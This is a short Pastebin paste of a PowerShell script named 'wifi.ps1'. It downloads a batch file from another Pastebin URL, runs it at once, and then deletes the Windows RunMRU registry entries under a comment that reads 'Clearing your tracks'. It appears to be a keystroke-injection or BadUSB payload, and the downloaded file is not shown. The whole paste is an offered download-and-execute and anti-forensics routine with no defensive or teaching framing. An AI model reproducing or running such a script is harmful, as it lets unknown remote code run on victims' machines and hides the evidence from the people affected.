cephurs

wifi.ps1

Nov 24th, 2019
417
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. cd /;mkdir x64;cd x64;
  2. wget https://pastebin.com/raw/QCnzsxAs -OutFile wifi.bat
  3. start wifi.bat
  4.  
  5.  // --> Clearing your tracks
  6.  
  7.  
  8. Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
  9.  
  10. exit
Add Comment
Please, Sign In to add comment